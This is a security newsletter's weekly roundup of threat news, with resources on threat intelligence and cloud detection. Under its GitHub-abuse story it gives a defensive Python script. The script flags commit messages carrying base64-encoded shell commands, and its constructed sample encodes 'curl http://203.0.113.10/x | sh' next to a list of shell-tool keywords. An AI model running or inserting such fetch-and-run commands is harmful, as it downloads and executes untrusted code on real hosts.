Hello there 👋
Welcome back to the Kraven Security weekly newsletter. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
The final week before Christmas has gone out with a bang. We saw adversaries using new tradecraft as they abuse GitHub for command and control, the FBI executing a major disruption operation against the Blackcat (ALPHV) ransomware gang, and a leading Lapsus$ hacker receiving an indefinite hospital order.
At Kraven we have continued our series on cyber threat intelligence (CTI) definitions and key concepts. The series is focused on providing you with the fundamental knowledge and language to succeed in CTI and we look forward to releasing more articles in 2024!
Let’s jump into this week’s top news stories.
Top 5 News Stories
Story #1: MongoDB Comes Under Attack
The database company MongoDB disclosed a recent cyber attack that led to the exposure of customer data. The company detected the breach on Wednesday (December 13th) and found that the attacker gained access to customer account metadata and contact information. The investigation is still ongoing. MongoDB recommends that customers:
- “be vigilant of social engineering and phishing attacks”
- “implement MFA” if you are not already doing so
Source: Bleeping Computer
Story #2: The Top 7 Trends Shaping Software as a Service (SaaS) Security in 2024
As we round out 2023, let’s take a look at the top 7 trends shaping SaaS security in 2024 according to The Hacker News. As SaaS becomes the backbone of corporate IT, it is crucial to stay updated on the latest developments in securing it. The article covers the trends influencing the state of SaaS security for 2024, and what you can do about each of them.
Source: The Hacker News
Story #3: Hackers Abuse GitHub to Evade Detection and Control Victims
Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists to host payloads and issuing malicious commands via git commit messages. Adversaries have long used legitimate public services (e.g. Dropbox, Google Drive, OneDrive, Discord, etc.) as infrastructure because their traffic blends in with normal usage, and GitHub is the latest evolution of this trend. The abuse of Gists and commit messages for command delivery is an emerging threat to be aware of, and one that network controls alone will not catch if your developers already talk to GitHub all day.
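To make the commit-message technique concrete, here is an added example (not code from the Reversing Labs report or from any real malware) of a simple detection heuristic: take `git log` output, look for base64-looking tokens in commit messages, decode them, and flag any that decode to shell-like commands. The sample commit messages, the hashes, the keyword list and the 203.0.113.10 address (a documentation range) are all constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample data: two benign commits and one whose message carries
# a base64-encoded shell command, the way a commit-message C2 channel might.
SAMPLE_COMMITS = [
    ("a1b2c3d", "Fix typo in README"),
    ("d4e5f6a", "Update build: "
     + base64.b64encode(b"curl http://203.0.113.10/x | sh").decode()),
    ("0badf00", "Bump version to 1.2.3"),
]

# Runs of base64 alphabet characters long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Assumed indicators of a command; extend for your environment.
SHELL_HINTS = ("curl ", "wget ", "| sh", "bash -c", "powershell", "/bin/sh", "cmd.exe")


def parse_git_log(text):
    """Parse `git log --format='%h%x09%s'` output into (sha, subject) pairs."""
    commits = []
    for line in text.splitlines():
        sha, _, msg = line.partition("\t")
        if sha:
            commits.append((sha, msg))
    return commits


def decode_candidates(message):
    """Return the printable UTF-8 strings hidden in base64 tokens of a message."""
    decoded = []
    for tok in B64_TOKEN.findall(message):
        try:
            raw = base64.b64decode(tok, validate=True)  # strict alphabet/padding
        except (binascii.Error, ValueError):
            continue
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def suspicious_commits(commits):
    """Return (sha, decoded_payload) for commits hiding shell-like commands."""
    hits = []
    for sha, msg in commits:
        for text in decode_candidates(msg):
            if any(h in text for h in SHELL_HINTS):
                hits.append((sha, text))
    return hits


if __name__ == "__main__":
    for sha, payload in suspicious_commits(SAMPLE_COMMITS):
        print(f"{sha}: hidden command -> {payload!r}")
```

In practice you would feed `parse_git_log` the output of `git log --format='%h%x09%s'` for the repositories your hosts actually clone, and treat a hit as a hunting lead rather than a verdict: legitimate commit messages rarely contain long base64 strings that decode to `curl ... | sh`, but an attacker can trivially swap base64 for another encoding, so pair this with a check for which processes are fetching commit messages and Gists in the first place.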
Source: Reversing Labs
Story #4: FBI Disrupts Blackcat (ALPHV) Ransomware Operations
The FBI achieved a significant milestone in the fight against cyber threats by disrupting the Blackcat ransomware operation and releasing a decryption tool. The US law enforcement agency gained access to ALPHV’s infrastructure, siphoned off decryption keys, and helped more than 500 victims recover their files for free (saving approximately $68 million in ransom demands).
Source: US Department of Justice (DOJ)
Story #5: Lapsus$ Hacker Sentenced Indefinitely to a Hospital
Arion Kurtaj, one of the leading members of the Lapsus$ hacking group, has been given an indefinite hospital order, meaning he will be held in a secure hospital until doctors judge he is no longer a danger. The teenager was involved in the group’s hacking spree in 2021-2022, which saw them compromise Rockstar Games (makers of Grand Theft Auto), Nvidia, BT/EE, Samsung, and more.
Some people (mainly outside of the cyber community) are calling for the kid to get a job. However, this is a stark reminder of the responsibility and trust required to be considered a cyber security professional. As this kid found out, play stupid games and win stupid prizes.
Source: BBC News
Feature Article
Excited to share this quick guide to Cyber Threat Intelligence (CTI)!
You’ve heard about CTI, but do you really know what it is and how it empowers organizations in the cyber security landscape? This quick guide demystifies CTI, diving into its key components and how it’s used. Discover how CTI enhances security operations, streamlines incident response capabilities, and more!
Dive in and learn more about CTI here.
Learning Resources
IAM and Detection Engineering
Sekoia released a great article this week that dives into the importance of detecting Identity and Access Management (IAM) events, explaining why it is essential in today’s cloud-centric environments, where identity is the primary perimeter, and how it enables organizations to proactively protect their systems, data, and sensitive information. Check it out if you have a role in securing any cloud environment!
Source: Sekoia
Triad of Success: Education, Experience, and Networking
Wade Wells walks you through how to be successful in the cyber security industry by combining education, experience, and networking. Definitely worth a watch if you are looking to jump into the industry or move up the ladder.
Microsoft Releases Incident Response Guide
Microsoft has released an updated incident response guide that details the best practices for security teams and leaders! The guide walks you through all the stages of an incident, from planning to remediation, and uses a real-life example for demonstrations. Give it a read if you have to respond to cyber incidents in your organization.
Source: Microsoft Security
CompTIA Security+ Exam Practice Questions and Tips
The CompTIA Security+ exam tests your cyber security knowledge across a wide range of topics to ensure you are ready for an entry-level role. The best way to prepare for this exam is by studying and answering CompTIA Security+ practice questions.
Practice questions help you assess your current knowledge, allow you to identify areas that need improving, and let you accurately determine if you are ready to take the real exam. They are an essential piece of preparing for your Security+ exam.
This article gives you a taste of what to expect on the real exam by providing multiple-choice and performance-based (PBQ) practice questions. You can interactively test your knowledge using these questions across all five of the Security+ domains. This is not an exhaustive list of everything you will be tested on in the Security+ exam. Just a glimpse of what to expect.
Source: StationX
Learn to Deploy AWS Resources with Terraform
This demonstration shows you how to use an Infrastructure as Code (IaC) tool (Terraform) to create an AWS development environment. Automated deployment of lab environments is a big topic in cyber security, and being able to build and tear down reproducible infrastructure is a useful skill to master.
Elevate Your Cyber Threat Intelligence Skills for Free
MITRE has awesome free training that covers what the MITRE ATT&CK framework is and how you can use it for threat intelligence. The material is delivered in video lectures you can easily follow along with and even includes exercises for you to practice your new skills.
Source: MITRE ATT&CK
Personal Notes
🤔 That will do it for 2023! At Kraven we are taking a break for the holidays, so unfortunately there will be no article or newsletter next week. However, we will be back starting the first week of 2024 and hope you are ready for more great learning content.
This year has been a rollercoaster at Kraven. The company was founded, we built a website, and we started a newsletter! This allowed us to reach our aim of delivering high-value content around cyber threat intelligence, threat hunting, and crafting custom tools. In 2024 we want to continue this effort and expand our content offering: more content, better content, and new platforms like YouTube. Till then, happy holidays everyone!
P.S.
I encourage everyone to take a break over Christmas and recharge their batteries. Cyber security is a challenging industry that can wear you down. Taking care of yourself and getting away from the computer occasionally is important. Have a great Christmas!